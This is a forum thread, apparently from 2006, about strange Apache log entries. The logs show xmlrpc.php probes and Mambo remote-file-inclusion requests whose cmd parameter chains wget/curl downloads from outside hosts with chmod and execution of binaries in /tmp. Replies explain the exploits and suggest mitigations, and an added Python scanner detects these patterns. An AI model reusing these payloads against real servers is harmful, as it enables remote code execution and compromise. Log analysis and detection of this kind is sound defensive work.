strange things in apache2 log file


Post by Bluefan » Tue Apr 04, 2006 7:29 am

I just came across my Apache log file, as I had just set up a very small server just to test the connection. The only ones who knew about it were me and someone else I asked to test.
But I got this strange stuff in the logs:

Code:

85.124.118.43 - - [04/Apr/2006:04:55:18 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:18 -0700] "POST /xmlrpc.php HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:19 -0700] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:20 -0700] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:24 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:26 -0700] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:27 -0700] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:28 -0700] "POST /xmlrpc.php HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:29 -0700] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:30 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:31 -0700] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:32 -0700] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:33 -0700] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


Seeing the 404 codes, I know nothing happened, but what the heck is going on? I ran my server on my Octane just for a few hours, so what can this be?
I used the default log directive of neko apache2.
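Added example (not from the original post or from any of the repliers): a small Python scanner that parses Apache combined-format lines like the ones posted above and flags the two patterns in them, blind POSTs to the usual xmlrpc.php locations and a request that points mosConfig_absolute_path at a remote URL while carrying a shell command chain in the cmd parameter. It generalises slightly beyond the posted lines: any query value that is a URL is reported as a remote-include candidate, and any value that mixes shell separators with a download tool is reported as a command chain, with the download targets pulled out as indicators. The sample log is constructed for the example (three lines reused from the post plus one benign request from a TEST-NET address); the function names are the example's own.

```python
"""Scan Apache combined-format access log lines for xmlrpc.php probing and
remote-file-inclusion requests that smuggle a shell command chain."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample input: three lines copied from the post above plus one
# benign request from a TEST-NET address that must not be flagged.
SAMPLE_LOG = r'''
85.124.118.43 - - [04/Apr/2006:04:55:18 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:27 -0700] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:33 -0700] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.10 - - [04/Apr/2006:05:01:02 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
'''

# Apache "combined" format.  The request target is matched lazily and the
# protocol token anchors it, so "echo|  HTTP/1.1" (two spaces) still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) +(?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
DOWNLOAD_TOOLS = ("wget", "curl", "fetch", "lynx")
SHELL_SEPARATORS = (";", "|", "&&", "`")


def parse_line(line):
    """Return a dict for one log line, or None if it is not combined format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"], _, query = rec["target"].partition("?")
    # Split the query by hand: the injected command chain contains ';', which
    # older urllib.parse.parse_qsl() versions also treat as a pair separator.
    rec["params"] = []
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        rec["params"].append((unquote(key), unquote(value)))
    return rec


def classify(rec):
    """Yield (kind, detail) findings for one parsed record."""
    if rec["method"] == "POST" and rec["path"].endswith("/xmlrpc.php"):
        yield "xmlrpc_probe", rec["path"]
    for key, value in rec["params"]:
        # A URL in a query value is what a remote file inclusion needs
        # (mosConfig_absolute_path in the posted line is one such variable).
        if re.match(r"(?i)(?:https?|ftp)://", value):
            yield "remote_include", f"{key}={value}"
        # Shell separators plus a download tool: the dropper command chain.
        if any(sep in value for sep in SHELL_SEPARATORS) and any(
                re.search(rf"\b{tool}\b", value) for tool in DOWNLOAD_TOOLS):
            yield "command_chain", value


def dropper_urls(command_chain):
    """Pull the download targets (the indicators worth blocking) out of a chain."""
    urls = []
    for stage in re.split(r"[;|]|&&", command_chain):
        m = re.search(r"\b(?:wget|curl)\b(?:\s+-\S+(?:\s+\S+)?)*\s+(\S+)",
                      stage.strip())
        if m:
            urls.append(m.group(1))
    return urls


def scan(log_text):
    """Return one finding dict per (line, pattern) hit."""
    report = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for kind, detail in classify(rec):
            report.append({"ip": rec["ip"], "ts": rec["ts"],
                           "status": rec["status"], "kind": kind,
                           "detail": detail})
    return report


def summarize(report):
    """Count findings per (source IP, kind): the first view an analyst wants."""
    return Counter((r["ip"], r["kind"]) for r in report)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for (ip, kind), n in sorted(summarize(hits).items()):
        print(f"{ip:16} {kind:16} {n}")
    for r in hits:
        if r["kind"] == "command_chain":
            print("decoded chain:", r["detail"])
            print("dropper URLs :", dropper_urls(r["detail"]))
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents; the status code is kept in each finding so that a 200 or 500 on one of these requests (as opposed to the 404s above) stands out as the case that actually needs investigating.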


Post by Brombear » Tue Apr 04, 2006 8:24 am

Some script kiddies are trying to target your server to upload some bad scripts via known vulnerable (in your case not installed) things. Nothing bad happened.

Matthias
Life is what happens while we are making other plans


Post by joerg » Wed Apr 05, 2006 11:58 pm

Once again a PEAR XML-RPC script is vulnerable. An unvalidated variable goes into an eval() function call, which can then execute PHP code. This code was used in some other projects too, like blogs, CMSs and so on.

Nothing special and not really new.

regards
Joerg


Post by johnsmith » Thu Apr 06, 2006 12:08 am

What they're trying to do is execute programs on your computer that are fetched off a remote server and saved in /tmp. Even if you do have the vulnerable PHP apps, you can mitigate this by having allow_url_fopen off in php.ini (so they can't get the remote program) and by mounting /tmp as noexec.
